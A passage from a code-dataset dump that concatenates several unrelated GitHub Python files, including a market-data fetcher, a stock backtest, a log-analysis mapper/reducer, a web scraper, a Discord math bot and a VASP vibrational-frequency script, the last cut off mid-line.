data...\")\n start_fetch = time.time()\n nifty_nearest, df_nifty_list = self.dataFetcher.fetch_data(self.init_vars.number, self.init_vars.step[\"nf\"], self.init_vars.stock[\"nf\"], self.init_vars.urls[\"url_nf\"], exp_date)\n\n # Export data to Excel for Nifty\n for i, df_nifty in enumerate(df_nifty_list):\n self.export_to_excel(df_nifty, \"Nifty_Data\", exp_date[i])\n\n end_fetch = time.time()\n # Calculate the time taken during this iteration\n elapsed_time = end_fetch - start_fetch\n print(\"Time elapsed to fetch and save Nifty data =\", int(elapsed_time), \"seconds\")\n logging.info(\"Time elapsed to fetch and save Nifty data = %s seconds\", str(int(elapsed_time)))\n\n # Bank Nifty data\n logging.info(\"Fetching Bank Nifty data...\")\n start_fetch = time.time()\n bank_nifty_nearest, df_bank_nifty_list = self.dataFetcher.fetch_data(self.init_vars.number, self.init_vars.step[\"bnf\"], self.init_vars.stock[\"bnf\"], self.init_vars.urls[\"url_bnf\"], exp_date)\n\n # Export data to Excel for Bank Nifty\n for i, df_bank_nifty in enumerate(df_bank_nifty_list):\n self.export_to_excel(df_bank_nifty, \"Bank_Nifty_Data\", exp_date[i])\n\n end_fetch = time.time()\n # Calculate the time taken during this iteration\n elapsed_time = end_fetch - start_fetch\n print(\"Time elapsed to fetch and save Bank Nifty data =\", int(elapsed_time), \"seconds\")\n logging.info(\"Time elapsed to fetch and save Bank Nifty data = %s seconds\", str(int(elapsed_time)))\n\n return nifty_nearest, bank_nifty_nearest\n","repo_name":"kira10krishna/OC-Live-Data","sub_path":"backend/python_scripts/dataProcessor.py","file_name":"dataProcessor.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74683049155","text":"\"\"\"\"Module for miscellaneous behavior stuff\n\nFor example, stuff like extracting lick times or choice times.\nTrialSpeak shouldn't depend on stuff like that.\n\n\n # Also get the pldf and use that to get lick times\n ldf = ArduFSM.TrialSpeak.read_logfile_into_df(bdf.loc[idx, 'filename']) \n \n # Get the lick times\n lick_times = ArduFSM.TrialSpeak.get_commands_from_parsed_lines(ldf, 'TCH')\n \n # Group them by trial number and lick type and extract times\n tt2licks = lick_times.groupby(['trial', 'arg0']).groups\n for (trial, lick_type) in tt2licks:\n tt2licks[(trial, lick_type)] = \\\n ldf.loc[tt2licks[(trial, lick_type)], 'time'].values / 1000.\n \n # Get response window time as first transition into response window\n state_change_df = ArduFSM.TrialSpeak.get_commands_from_parsed_lines(\n ldf, 'ST_CHG2')\n 
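# arg1 is the destination state, so this keeps only the transitions INTO the response window\n    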
rwin_open_times = my.pick_rows(state_change_df, \n arg1=state_name2num['RESPONSE_WINDOW'])\n rwin_open_times_by_trial = rwin_open_times.groupby(\n 'trial').first()['time'] / 1000.\n \n # Get choice time as first transition out of response window\n state_change_df = ArduFSM.TrialSpeak.get_commands_from_parsed_lines(\n ldf, 'ST_CHG2')\n rwin_close_times = my.pick_rows(state_change_df, \n arg0=state_name2num['RESPONSE_WINDOW'])\n rwin_close_times_by_trial = rwin_close_times.groupby(\n 'trial').first()['time'] / 1000.\n\"\"\"\nimport MCwatch\nimport ArduFSM\nimport numpy as np\n\ndef get_choice_times(behavior_filename, verbose=False):\n \"\"\"Calculates the choice time for each trial in the logfile\"\"\"\n # Find the state number for response window\n state_num2names = MCwatch.behavior.db.get_state_num2names() \n resp_win_num = dict([(v, k) for k, v in list(state_num2names.items())])[\n 'RESPONSE_WINDOW']\n \n # Get the lines\n lines = ArduFSM.TrialSpeak.read_lines_from_file(behavior_filename)\n parsed_df_by_trial = \\\n ArduFSM.TrialSpeak.parse_lines_into_df_split_by_trial(lines, \n verbose=verbose)\n \n # Identify times of state change out of response window\n # No sense in warning because there's also multiple state changes on\n # rewarded trials\n choice_times = ArduFSM.TrialSpeak.identify_state_change_times(\n parsed_df_by_trial, state0=resp_win_num, show_warnings=False)\n \n return choice_times \n\ndef get_included_trials(trial_times, data_range, t_start=0, t_stop=0):\n \"\"\"Identify the trials included in a temporal range.\n \n trial_times : Series of trial times (e.g., rwin times) indexed by\n trial labels\n \n data_range : 2-tuple (start, stop) specifying interval to include\n \n t_start, t_stop : amount of time before (after) each trial time that\n must be within data_range in order for that trial to be included.\n \n Returns: trial_labels that are included \n\n Ex:\n ## Get the trial matrix\n tm = MCwatch.behavior.db.get_trial_matrix(vs.bsession_name, True)\n\n # Include all random trials\n tm = my.pick_rows(tm, isrnd=True, outcome=['hit', 'error'])\n \n # Identify range of trials to include\n video_range_bbase = extras.get_video_range_bbase(vs)\n included_trials = extras.get_included_trials(tm['rwin_time'], \n data_range=video_range_bbase, t_start=-2, t_stop=0)\n tm = tm.loc[included_trials]\n \"\"\"\n return trial_times[\n (trial_times + t_start >= data_range[0]) &\n (trial_times + t_stop < data_range[1])\n ].index\n","repo_name":"cxrodgers/MCwatch","sub_path":"behavior/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70249190276","text":"from calculo import Calculo\nimport PySimpleGUI as sg\n\ndef main():\n calcular = Calculo()# objeto calculo\n layout = [[sg.Text('''Esta aplicação tem como finalidade demonstrar os valores que serão gastos\n com combustível durante uma viagem, com base no consumo do seu veículo, e\n com a distância determinada por você!''')],\n [sg.Text('''Os combustíveis disponíveis para este cálculo são: \n •\tÁlcool\n •\tDiesel\n •\tGasolina''')],\n [sg.Text('Distância a ser percorrida (KM):'), sg.Input(key='distancia')],# Entrada de distancia do usuario\n [sg.Text('Consumo por litro: '), sg.Input(key='litro')],# Entrada de litros do usuario\n [sg.Button('Calcular consumo')],# botão de calculo\n [sg.Output(size= (50, 20))]# Saida\n ]\n\n\n window = sg.Window('Calculadora de combustivel ', layout)\n while True:\n event, values = 
window.read()\n\n if event == sg.WIN_CLOSED:\n break\n\n distancia = float(values['distancia'])\n litro = float(values['litro'])\n\n print(calcular.calcular_gasto(distancia, litro))\n\nif __name__ == \"__main__\":\n main()","repo_name":"AlSolidade02/ScriptPython","sub_path":"CALCULADORA DE COMBUSTIVEL/main combustivel.py","file_name":"main combustivel.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29576021600","text":"'''solution by https://github.com/Defelo''' \nimport re\nbags = open('07_input.txt', 'r').read().splitlines()\n\ng = {}\nfor line in bags:\n a = re.match(r\"^([a-z]+ [a-z]+) bags\", line).group(1)\n\n b = re.findall(r\"(\\d+) ([a-z]+ [a-z]+) bags?\", line)\n g.setdefault(a, []).extend(b)\ncnt = -1\nq = [(1, \"shiny gold\")]\nwhile q:\n n, p = q.pop(0)\n \n cnt += n\n q += [(n * int(a), b) for a, b in g.get(p, [])]\nprint(cnt)","repo_name":"SH1RL0CK/advent_of_code","sub_path":"2020/07_puzzle2.py","file_name":"07_puzzle2.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28421570562","text":"from tempfile import mkdtemp\r\nimport zipfile\r\nimport logging\r\nimport shutil\r\nimport os\r\n\r\nfrom thief.auction.models import AuctionConfigs\r\nfrom thief.auction.forms import AuctionConfigsForm\r\nfrom thief.auction import csv_rules\r\n\r\nTEMP_PREFIX = \"tmp_auction_\"\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass CsvPacker(object):\r\n def get_csv_engine(self, type):\r\n if type == 'yahoo':\r\n return csv_rules.YahooRule(self.csv_file, 'w')\r\n elif type == 'ruten':\r\n return csv_rules.RutenRule(self.csv_file, 'w')\r\n elif type == 'rakuten':\r\n return csv_rules.RakutenRule(self.csv_file, 'w')\r\n\r\n @property\r\n def archive_path(self):\r\n return os.path.join(self.tempdir, \"archive.zip\")\r\n\r\n def __init__(self, auction_type):\r\n self.tempdir = mkdtemp(prefix=TEMP_PREFIX)\r\n self.csv_filename = os.path.join(self.tempdir, \"table.csv\")\r\n self.csv_file = open(self.csv_filename, \"wb\")\r\n \r\n gf = AuctionConfigsForm({c.key:c.value for c in AuctionConfigs.objects.all()})\r\n gf.full_clean()\r\n self.default_data = gf.cleaned_data\r\n\r\n self.csv = self.get_csv_engine(auction_type)\r\n if not self.csv: raise RuntimeError(\"Bad auction type\")\r\n\r\n self.archive = zipfile.ZipFile(self.archive_path, 'w')\r\n\r\n def pack(self, products):\r\n for p in products:\r\n meta, attach_files = p.export()\r\n meta = dict(self.default_data.items() + meta.items())\r\n self.csv.writerow(meta)\r\n\r\n for local, archname in attach_files:\r\n self.archive.write(local, archname)\r\n\r\n def get_fileobject(self):\r\n archname = self.csv.close_write()\r\n self.archive.write(self.csv_filename, archname)\r\n self.archive.close()\r\n\r\n return open(self.archive_path, \"rb\")\r\n\r\nclass CsvUnpacker(object):\r\n def get_csv_engine(self, type):\r\n if type == 'yahoo':\r\n return csv_rules.YahooRule(self.csv_file, 'r')\r\n elif type == 'ruten':\r\n return csv_rules.RutenRule(self.csv_file, 'r')\r\n \r\n def __init__(self, auction_type, file):\r\n self.csv_file = file\r\n self.csv = self.get_csv_engine(auction_type)\r\n \r\n def load(self):\r\n return [i for i in 
self.csv.readrows()]\r\n","repo_name":"yagami-cerberus/thief","sub_path":"thief/auction/csv_packer.py","file_name":"csv_packer.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69988126274","text":"# -*- encoding: utf-8 -*-\nimport time\nimport pandas as pd\nimport numpy as np\nfrom DataApi import quantosToken \n\nfrom jaqs.data import DataApi\n\nfrom jaqs.data import RemoteDataService\nfrom jaqs.trade import AlphaBacktestInstance\nfrom jaqs.trade import PortfolioManager\n#from jaqs.trade import RealTimeTradeApi\n\nimport jaqs.util as jutil\nimport jaqs.trade.analyze as ana\nfrom jaqs.trade import AlphaStrategy\nfrom jaqs.trade import AlphaTradeApi\nfrom jaqs.trade import model\nfrom jaqs.data import DataView\n\n# 设置文件存储路径\ndataview_dir_path = 'demoStrategy/dataview'\nbacktest_result_dir_path = 'demoStrategy'\n\n\ndata_config = {\n \"remote.data.address\": \"tcp://data.quantos.org:8910\",\n \"remote.data.username\": quantosToken.phone,\n \"remote.data.password\": quantosToken.key}\ntrade_config = {\n \"remote.trade.address\": \"tcp://gw.quantos.org:8901\",\n \"remote.trade.username\": quantosToken.phone,\n \"remote.trade.password\": quantosToken.key}\n\n# 设置Strategy number, 根据自己的实际情况设置\n# 例如:StrategyNo = 1043\nStrategyNo = 1045\n\n# -------------------------------------------------------------------------------\n# 设置目标股票、业绩基准、权重、时间\n# -------------------------------------------------------------------------------\nsymbol_weights = {'600519.SH': 0.25,\n '600036.SH': 0.25,\n '601318.SH': 0.25,\n '000651.SZ': 0.25}\n\nbenchmark = '000300.SH'\n\nmy_symbols = ','.join(symbol_weights.keys())\nstart_date = 20170201\nend_date = 20171001\n\n# 定义权重函数\ndef stockWeight(context, user_options=None):\n return pd.Series(symbol_weights)\n\n# -------------------------------------------------------------------------------\n# Main code 这个代码框不需要修改\n# -------------------------------------------------------------------------------\n\ndef test_save_dataview():\n ds = RemoteDataService()\n ds.init_from_config(data_config)\n dv = DataView()\n\n props = {'start_date': start_date, 'end_date': end_date,\n 'fields': 'sw1',\n 'symbol': my_symbols,\n 'freq': 1}\n\n dv.init_from_config(props, ds)\n dv.prepare_data()\n\n # set the benchmark\n res, _ = ds.daily(benchmark, start_date=dv.start_date, end_date=dv.end_date)\n dv._data_benchmark = res.set_index('trade_date').loc[:, ['close']]\n\n dv.save_dataview(folder_path=dataview_dir_path)\n\n\ndef test_alpha_strategy_dataview():\n dv = DataView()\n\n dv.load_dataview(folder_path=dataview_dir_path)\n\n props = {\n \"symbol\": dv.symbol,\n \"universe\": ','.join(dv.symbol),\n\n \"start_date\": dv.start_date,\n \"end_date\": dv.end_date,\n\n \"period\": \"week\",\n \"days_delay\": 0,\n\n \"init_balance\": 1e7,\n \"position_ratio\": 1.0,\n \"commission_rate\": 2E-4 # 手续费万2\n }\n props.update(data_config)\n props.update(trade_config)\n\n trade_api = AlphaTradeApi()\n\n signal_model = model.FactorSignalModel()\n signal_model.add_signal('stockWeight', stockWeight)\n\n strategy = AlphaStrategy(signal_model=signal_model, pc_method='factor_value_weight')\n pm = PortfolioManager()\n\n bt = AlphaBacktestInstance()\n \n context = model.Context(dataview=dv, instance=bt, strategy=strategy, trade_api=trade_api, pm=pm)\n \n signal_model.register_context(context)\n\n bt.init_from_config(props)\n\n bt.run_alpha()\n\n bt.save_results(folder_path=backtest_result_dir_path)\n \n\ndef 
test_backtest_analyze():\n ta = ana.AlphaAnalyzer()\n dv = DataView()\n dv.load_dataview(folder_path=dataview_dir_path)\n\n ta.initialize(dataview=dv, file_folder=backtest_result_dir_path)\n\n ta.do_analyze(result_dir=backtest_result_dir_path, selected_sec=ta.universe,\n brinson_group=None)\n\n# 运行这里跑回测\ntest_save_dataview()\ntest_alpha_strategy_dataview()\ntest_backtest_analyze()","repo_name":"baqiang/datatest","sub_path":"alphaSimple.py","file_name":"alphaSimple.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4192146014","text":"import sys\nimport re\nimport multiprocessing as mp\nimport time\n\ndef mapper(ifile, ofile):\n res_pattern = re.compile(r'\\.(png|jpg|gif|ico|mp4|mp3|flv|html|css|js|php)*', re.IGNORECASE)\n fi = open(ifile,'r')\n fo = open(ofile,'w')\n lines = fi.readlines()\n for line in lines:\n fields = line.strip().split()\n # extracting ip and the resource\n ip = fields[0]\n req_type = fields[5][1:]\n resource = fields[6]\n # print only if there is a resource and it's a GET request\n if res_pattern.search(resource):\n if req_type=='GET':\n fo.write(\"%s\\t%s\\n\"%(ip, resource))\n\ndef combiner(ifile, ofile):\n fi = open(ifile,'r')\n fo = open(ofile,'w')\n lines = fi.readlines()\n\n res_dict = {}\n\n for line in lines:\n fields = line.strip().split(\"\\t\")\n\n if len(fields) < 2:\n continue\n \n ip, resource = fields[0], fields[1]\n\n if ip not in res_dict.keys():\n res_dict[ip] = set()\n \n res_dict[ip].add(resource)\n\n for key, resources in res_dict.items():\n fo.write('%s\\t%s\\n' % (key, ','.join(resources)))\n\ndef reducer(files):\n result = open('par_result.txt','w')\n \n lines = []\n for file in files:\n f = open(file, 'r')\n flist = f.readlines()\n lines += flist\n f.close()\n\n # dictionary to store {ip : resourceList}\n network_dict = {}\n\n for line in lines:\n fields = line.strip().split(\"\\t\")\n\n if len(fields) < 2:\n continue \n\n ip, resource = fields[0], fields[1]\n # storing the resources requested by an ip in a set inside a dictionary\n if ip not in network_dict:\n network_dict[ip] = set()\n reslist = resource.split(\",\")\n for res in reslist:\n network_dict[ip].add(res)\n else:\n reslist = resource.split(\",\")\n for res in reslist:\n network_dict[ip].add(res)\n\n # function to count number of connected components in the network\n def connected_comps(ip_resource_dict):\n # dictionary to store {resource : ipList}\n network = {}\n # Iterating over network_dict to generate network graph\n for ip, resources in ip_resource_dict.items():\n for resource in resources:\n if resource not in network:\n network[resource] = set()\n network[resource].add(ip)\n\n # variables to store unique resources\n key1 = set()\n key2 = set()\n\n for resource in network.keys():\n key1.add(resource)\n key2.add(resource)\n \n for k1 in key1:\n for k2 in key2:\n # if the resource is still there in dictionary\n if k1!=k2 and (k2 in network.keys()) and (k1 in network.keys()):\n iplist1 = network[k1]\n iplist2 = network[k2]\n flag = False\n # check intersection between two lists of ips of two different resources\n for ip1 in iplist1:\n for ip2 in iplist2:\n if ip1==ip2:\n flag=True\n break\n if flag==True:\n break\n # If intersection found, merge the two lists into one list to make connected component\n if flag==True:\n for ip in iplist2:\n network[k1].add(ip)\n # remove the old list from dictionary\n network.pop(k2)\n return network\n\n con_comp = 
connected_comps(network_dict)\n    # variable to count disconnected pairs\n    discon_pairs = 0\n    # list to record size of iplists\n    sizes = []\n\n    for res, li in con_comp.items():\n        sizes.append(len(li))\n\n    for i, s in enumerate(sizes):\n        for j, s2 in enumerate(sizes):\n            if j > i:\n                discon_pairs += s*s2\n\n    result.write(str(discon_pairs))\n\ninputfiles = [\n    'access_log11.txt',\n    'access_log12.txt'\n]\n\n# 2 output files\noutputfiles = [\n    'token1.txt',\n    'token2.txt'\n]\n\n# 2 aggregation files\naggfiles = [\n    'agg1.txt',\n    'agg2.txt'\n]\n\nstarttime = time.time()\n\nprocesses = [mp.Process(target=mapper, args=[inputfiles[i], outputfiles[i]]) for i in range(2)]\n\nfor p in processes:\n    p.start()\nfor p in processes:\n    p.join()\n\nprocesses = [mp.Process(target=combiner, args=[outputfiles[i], aggfiles[i]]) for i in range(2)]\n\nfor p in processes:\n    p.start()\nfor p in processes:\n    p.join()\n\nreducer(aggfiles)\n\nprint(\"Elapsed time (in seconds): \", (time.time() - starttime))","repo_name":"yashpaneliya/CS69202-Design-Lab","sub_path":"NoSQL-2/Query2/par_mapper.py","file_name":"par_mapper.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8846784889","text":"\"\"\"\n\n\"\"\"\nfrom notifications import SNSNotificationPublisher\n\n\ndef lambda_handler(event, context):\n    topic_arn = event.get(\"topic_arn\")\n    subject = event.get(\"subject\")\n    message_body = event.get(\"message_body\")\n\n    SNSNotificationPublisher.publish_message(\n        topic_arn=topic_arn,\n        subject=subject,\n        message_body=message_body,\n    )\n","repo_name":"jszafran/personal-aws-data-lake","sub_path":"src/common/lambda/publish_message.py","file_name":"publish_message.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"21694730544","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom requests.exceptions import RequestException\nimport time\nimport logging\nimport psycopg2\n\ndef read_urls_from_file(file_path):\n    with open(file_path, 'r') as file:\n        urls = [line.strip() for line in file]\n    return urls\n\ndef send_request(url):\n    headers = {'User-Agent': 'Mozilla/5.0'}\n    try:\n        response = requests.get(url, headers=headers)\n        response.raise_for_status() # Raises a HTTPError if the status is 4xx, 5xx\n        return response\n    except RequestException as e:\n        logging.error('Error during requests to {0} : {1}'.format(url, str(e)))\n        return None\n\ndef parse_html(response):\n    return BeautifulSoup(response.content, 'html.parser')\n\ndef extract_titles(soup):\n    article_elements = soup.find_all('article')\n    return [element.find('h2').text.strip() for element in article_elements]\n\ndef save_data(departamento):\n    try:\n        conn = psycopg2.connect(\n            host=\"postgres\",\n            database=\"postgres\",\n            user=\"xbz\",\n            password=\"1234\"\n        )\n        cur = conn.cursor()\n        # Inserta en la tabla Departamentos\n        cur.execute(\"\"\"\n            INSERT INTO Departamentos (titulo, descripcion, precio, ubicacion_id, dormitorios, banios, area) \n            VALUES (%s, %s, %s, %s, %s, %s, %s)\n            RETURNING id_departamento\n        \"\"\", (departamento['titulo'], departamento['descripcion'], departamento['precio'], departamento['ubicacion_id'], \n            departamento['dormitorios'], departamento['banios'], departamento['area']))\n        id_departamento = cur.fetchone()[0]\n        # Inserta en la tabla Ubicaciones si no existe\n        cur.execute(\"\"\"\n            INSERT INTO Ubicaciones (id_ubicacion, nombre) \n            VALUES (%s, %s)\n            
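-- do-nothing upsert: skip the row when this id_ubicacion already exists\n            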
ON CONFLICT (id_ubicacion) DO NOTHING\n \"\"\", (departamento['ubicacion_id'], departamento['ubicacion_nombre']))\n\n # Inserta en las tablas Amenidades y Departamento_Amenidad\n for amenidad in departamento['amenidades']:\n cur.execute(\"\"\"\n INSERT INTO Amenidades (nombre) \n VALUES (%s)\n ON CONFLICT (nombre) DO UPDATE SET nombre = excluded.nombre\n RETURNING id_amenidad\n \"\"\", (amenidad,))\n \n id_amenidad = cur.fetchone()[0]\n\n cur.execute(\"\"\"\n INSERT INTO Departamento_Amenidad (id_departamento, id_amenidad) \n VALUES (%s, %s)\n \"\"\", (id_departamento, id_amenidad))\n conn.commit()\n cur.close()\n conn.close()\n\n except psycopg2.DatabaseError as e:\n print(f'Error {e}')\n return None\ndef scrape_website(url):\n for i in range(3): # Retry up to 3 times\n response = send_request(url)\n if response is not None:\n soup = parse_html(response)\n titles = extract_titles(soup)\n save_data(titles)\n break\n else:\n time.sleep(2**i) # Exponential backoff\n else:\n logging.error('Failed to retrieve website content after 3 attempts.')\n\n# Example usage\nurls_file_path = 'urls.txt' # Replace with your file path\nurls = read_urls_from_file(urls_file_path)\nfor url in urls:\n scrape_website(url)\n\n","repo_name":"Xbz-24/Scrapers","sub_path":"scraperv2.py","file_name":"scraperv2.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71194918273","text":"import discord\nfrom discord.ext import commands, tasks\nimport os\nfrom sympy import *\nfrom PIL import Image, ImageDraw, ImageFont\n\nprefixes = ['szgabi', '+']\n\ndef makeimg(txt):\n filename = \"img.png\"\n image = Image.new(mode = \"RGB\", size = (len(txt)*14+6, 50), color = \"white\")\n fnt = ImageFont.truetype('arial.ttf', 30)\n draw = ImageDraw.Draw(image)\n draw.text((1,5), txt.replace('**','^'), font=fnt, fill=(0,0,0))\n\n image.save(filename)\n return filename\n\nasync def get_prefix(client, message):\n if not message.guild:\n return\n return commands.when_mentioned_or(*prefixes)(client, message)\n\nclient = commands.Bot(command_prefix = get_prefix, status = discord.Status.idle, activity=discord.Game(name=\"Booting..\"))\n\n@client.event\nasync def on_ready():\n\t\tprint('Lets rock!')\n\t\tprint(client.user.name)\n\t\tprint(client.user.id)\n\t\tprint(client.guilds)\n\t\tprint(\"----------\")\n\t\tawait client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"students cry\"))\n\n\"\"\"\nfor filename in os.listdir('./cogs'):\n if filename.endswith('.py'):\n client.load_extension(f'cogs.{filename[:-3]}')\n \"\"\"\n\n@client.event\nasync def on_message(message):\n print(f'{message.content}')\n await client.process_commands(message)\n \n@client.command(description='Kills the bot')\nasync def kys(ctx):\n if ctx.author.id == 297689894208274432:\n await ctx.channel.send(\"T Ö :regional_indicator_r: T É N E T E S E N\")\n await client.logout()\n exit()\n else: await ctx.channel.send(\"You jerk!\")\n\n@client.command()\nasync def iintegral(ctx, fv, dt):\n x = Symbol(dt)\n summa = integrate(fv,x)\n await ctx.send(\"A kapott eredmény történetesen:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summa))}'))\n\n@client.command()\nasync def integral(ctx, fv, dt, a, b):\n x = Symbol(dt)\n summa = integrate(fv, (x, a, b))\n summma = integrate(fv, x)\n await ctx.send(\"A határozatlan integrálja:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summma))}'))\n await ctx.send(\"A kapott 
eredmény történetesen:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summa))}'))\n\n@client.command()\nasync def derival(ctx, fv, dt, number):\n x = Symbol(dt)\n summa = diff(fv, x, number)\n await ctx.send(\"A kapott eredmény történetesen:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summa))}'))\n\n@client.command()\nasync def limes(ctx, fv, a, b):\n summa = limit(fv, a, b)\n await ctx.send(\"A kapott eredmény történetesen:\")\n await ctx.channel.send(file=discord.File(f'{makeimg(str(summa))}'))\n\n@client.command()\nasync def join(ctx):\n await ctx.author.voice.channel.connect()\n\n@client.command()\nasync def leave(ctx):\n await ctx.voice_client.disconnect()\n\n@client.command(description ='Asks for server latency')\nasync def ping(ctx):\n\tping_ = client.latency\n\tping = round(ping_ *1000)\n\tawait ctx.channel.send(f\"Késik a kép drága? Csakis ennyit késhet {ping}ms\")\n\n@client.group()\nasync def prefix(ctx):\n if ctx.invoked_subcommand is None:\n await ctx.send('Invalid command passed...')\n\n@prefix.command()\nasync def add(ctx, prefix):\n global prefixes\n if prefix in prefixes:\n await ctx.channel.send('Már létezik, te literális majom! :rofl:')\n else:\n prefixes.append(prefix)\n await ctx.channel.send(f'Added `{prefix}` to the prefix list. :ok_hand:')\n\n@prefix.command()\nasync def remove(ctx, prefix):\n if prefix in prefixes:\n prefixes.remove(prefix)\n await ctx.channel.send(f'Removed `{prefix}` from the prefix list.')\n else:\n await ctx.channel.send('Nincs ilyen prefix! :angry::anger:')\n\n@prefix.command()\nasync def list(ctx):\n msgs = '['\n msg = ''\n for x in prefixes:\n msg = msg+ msgs+ x+'] '\n await ctx.channel.send(f'```{msg}```')\n\nclient.run(\"\")\n\n","repo_name":"Bende126/vikbot","sub_path":"doomers/szgabi.py","file_name":"szgabi.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17906064602","text":"#!/usr/bin/env python3\n\n# Version 0.1\nimport numpy as np\n\nprint(' Recalculation of vibrational frequencies from Hessian matrix')\n\ndef CodeStatus(inStr, **kwargs):\n\tprint(' '*kwargs.get('l',4) + '> '+ inStr, end=kwargs.get('end','\\n'))\n\ndef FixNumBlanck(ifloat, **kwargs):\n\tdec = '{:.'+str(kwargs.get('d',4))+'f}'\n\tlength = kwargs.get('l', 10)\n\tstrout = dec.format(ifloat)\n\tif len(strout)<length: strout = ' '*(length-len(strout))+strout\n\treturn strout\n\ndef FixBlanck(iStr, **kwargs):\n\tlength = kwargs.get('l', 10)\n\tstrout = iStr\n\tif len(strout)<length: strout = ' '*(length-len(strout))+strout\n\treturn strout\n\n################################################################################################################################\n################################################################################################################################\n\n############ Check Information in POSCAR\ntry:\n\t# Open, read and extract information nedded\n\twith open('POSCAR','r') as f:\n\t\tPOSCAR = f.readlines()\n\t\tAtomType_POSCAR = POSCAR[5].split()\n\t\tAtomQuant_POSCAR = [int(iT) for iT in POSCAR[6].split()]\n\t# Report\n\tstrPOSCAR = ''\n\tfor i,j in zip(AtomQuant_POSCAR, AtomType_POSCAR): strPOSCAR +=str(i)+' '+j+', '\n\tCodeStatus('POSCAR file found and properly read: '+strPOSCAR[:-2])\n\n\t############################################################################################\n\t#### Created: \tAtomType_POSCAR = ['Atom name 1', 'Atom name 2']\n\t####\t\t\tAtomQuant_POSCAR = ['Amomunt 
of Atom 1', 'Amount of Atom 2', ...]\n\t############################################################################################\n\nexcept:\n\tquit(' '*8+'>>>> Is there something wrong with the POSCAR file? Is it there? Are atomic types in the 6th line?')\n\n\n############ Check Information in POTCAR\ntry:\n\t# Open POTCAR, get Atomic names and POMASS masses\n\twith open('POTCAR','r') as f:\n\t\tAtomType_POTCAR = []\n\t\tAtomMass_POTCAR = []\n\t\tfor iLine in f.readlines():\n\t\t\tif 'VRHFIN' in iLine: AtomType_POTCAR.append(iLine.split('=')[1].split(':')[0])\n\t\t\telif 'POMASS' in iLine: AtomMass_POTCAR.append(float(iLine.split('=')[1].split(';')[0]))\n\n\t# Check POTCAR mass information is complete (each atom type has a mass)\n\tif not len(AtomType_POTCAR) == len(AtomMass_POTCAR): quit(' ' * 8 + '>>>> Mass information is missing. Something is wrong with the POTCAR file.')\n\n\t# Report\n\tCodeStatus('POTCAR has been found and properly read')\n\nexcept:\n\tquit(' '*8+'>>>> There is something wrong with the POTCAR file. Is it there?')\n\n############ Check POTCAR and POSCAR coincide\nif not AtomType_POTCAR == AtomType_POSCAR: quit(' '*8+'>>>> POSCAR and POTCAR species do not coincide. POSCAR='+str(AtomType_POSCAR)+' / POTCAR='+str(AtomType_POTCAR))\n\n\n\t############################################################################################\n\t#### Created: \tAtomType_POTCAR = ['Atom name 1', 'Atom name 2']\n\t####\t\t\tAtomMass_POTCAR = ['Mass of Atom 1', 'Mass of Atom 2', ...]\n\t############################################################################################\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n#### Consolidate parametric information\n\n#### Construct dictionary of Atom masses\nAtomMass = {}\nfor i,j in zip(AtomType_POTCAR, AtomMass_POTCAR): AtomMass[i] = j\n# CodeStatus('Atom masses dictionary created in the form \'Atom name\':\'Atom mass\'')\nCodeStatus('Atom masses dictionary : ' + str(AtomMass)) # Debug\n\n#### Create Atom List dictionary: Atom_index['Atom number'] = 'Atom name'\nAtom_index = {}\nAtomCounter = 0\nfor i, j in zip(AtomQuant_POSCAR, AtomType_POSCAR):\n\tfor k in range(int(i)):\n\t\tAtomCounter += 1\n\t\tAtom_index[str(AtomCounter)] = [j,AtomMass[j]]\nCodeStatus('Atom index created = {\'Atom index number\' : [\'Atom name\', Atom mass]}')\nCodeStatus('Atom index created = {' + list(Atom_index.keys())[0]+':'+str(list(Atom_index.values())[0])+' ... 
'+ list(Atom_index.keys())[-1]+':'+str(list(Atom_index.values())[-1])+'}') # Debug\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n\n#### Wish to modify?\nModifiying = True\nwhile Modifiying:\n\tif input(' '*4+'> Wish to modify some masses ? (y/def=n) : ') == 'y':\n\t\t#####\n\t\tprint(' '*8+'.'*40)\n\t\t#####\n\n\t\t# Ask for Modification type\n\t\tModificationType = str(input(' '*8+'> Modify by atom type (def=t) or by atom index (i) ? : '))\n\t\tif ModificationType == '': ModificationType = 't'\n\n\t\tif ModificationType not in ['t','i']:\n\t\t\tCodeStatus('Option has to be \'t\' (for atom type, default option) or \'i\' (for atom index), try again.')\n\t\t\tcontinue\n\n\t\t# Modify by atom type\n\t\tif ModificationType == 't':\n\t\t\t# Ask for atom name\n\t\t\ttry:\n\t\t\t\tModyAtomName = input(' '*12+'> Modify mass of atom (name) : 